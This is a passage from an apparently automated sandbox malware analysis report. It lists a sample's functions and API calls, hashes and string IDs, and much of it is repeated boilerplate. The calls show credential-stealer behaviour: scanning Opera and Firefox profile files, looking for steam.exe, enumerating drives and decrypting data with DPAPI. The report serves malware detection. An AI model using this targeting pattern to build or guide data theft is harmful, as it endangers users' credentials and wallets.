                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                  • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                  • API String ID: 2567437900-1710495004
                                                                                                                  • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                  • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                  • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                  • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                  Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                  • _memset.LIBCMT ref: 004151E5
                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                    • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                    • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                  • API String ID: 441469471-147700698
                                                                                                                  • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                  • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                  • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                  • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                  Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                  • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                  • String ID: prefs.js
                                                                                                                  • API String ID: 893096357-3783873740
                                                                                                                  • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                  • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                  • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                  • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                  Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040B8EB
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3801961486-0
                                                                                                                  • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                  • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                  • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                  • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                  Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                  • String ID: steam.exe
                                                                                                                  • API String ID: 1799959500-2826358650
                                                                                                                  • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                  • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                  • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                  • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                  Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                  • String ID: /
                                                                                                                  • API String ID: 507856799-4001269591
                                                                                                                  • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                  • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                  • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                  • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                  Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1799959500-0
                                                                                                                  • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                  • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                  • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                  • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                  Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                  • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                  • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                  • String ID: DPAPI
                                                                                                                  • API String ID: 2068576380-1690256801
                                                                                                                  • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                  • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                  • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                  • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                  Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 907984538-0
                                                                                                                  • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                  • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                  • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                  • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                  Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                  Download Yara Rule
